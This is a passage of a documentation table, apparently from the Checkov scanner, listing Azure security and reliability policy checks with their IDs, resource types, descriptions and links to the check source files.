| Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1977 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1978 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | +| 1979 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | +| 1980 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | +| 1981 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | +| 1982 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | +| 1983 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | 
[APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | +| 1984 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | +| 1985 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | +| 1986 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1987 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1988 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1989 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1990 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | 
[VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1991 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1992 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1993 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1994 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | +| 1995 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. 
| Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | +| 1996 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1997 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1998 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | +| 1999 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | +| 2000 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | +| 2001 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. 
| Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | +| 2002 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | +| 2003 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | +| 2004 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | +| 2005 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | +| 2006 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | +| 2007 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | +| 2008 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public 
network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | +| 2009 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | +| 2010 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | +| 2011 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | +| 2012 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | +| 2013 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | +| 2014 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | +| 2015 | 
CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | +| 2016 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | +| 2017 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | +| 2018 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | +| 2019 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | +| 2020 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | +| 2021 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | 
[StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | +| 2022 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | +| 2023 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | +| 2024 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | +| 2025 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | +| 2026 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | +| 2027 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | +| 2028 | CKV_AZURE_213 | resource | 
azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2029 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2030 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2031 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 2032 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 2033 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | +| 2034 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 2035 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | 
Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 2036 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | +| 2037 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | +| 2038 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | arm | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 2039 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | Bicep | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 2040 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | +| 2041 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | +| 2042 | CKV_AZURE_220 | resource | 
azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | +| 2043 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2044 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2045 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2046 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2047 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 2048 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | 
[AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 2049 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | +| 2050 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | +| 2051 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | +| 2052 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | +| 2053 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 2054 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | 
[AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 2055 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | +| 2056 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | +| 2057 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | +| 2058 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | +| 2059 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | +| 2060 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | +| 2061 | CKV_AZURE_234 | resource | 
azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | +| 2062 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | +| 2063 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | arm | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 2064 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | Bicep | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 2065 | CKV_AZURE_236 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts enable local authentication | Terraform | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py) | +| 2066 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. 
| Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | +| 2067 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | arm | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 2068 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | Bicep | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 2069 | CKV_AZURE_238 | resource | azurerm_cognitive_account | Ensure that Cognitive Services account is not configured with managed identity | Terraform | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py) | +| 2070 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | arm | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 2071 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | Bicep | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 2072 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | 
[StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | +| 2073 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 2074 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 2075 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2076 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2077 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2078 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | 
[VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2079 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2080 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2081 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2082 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | 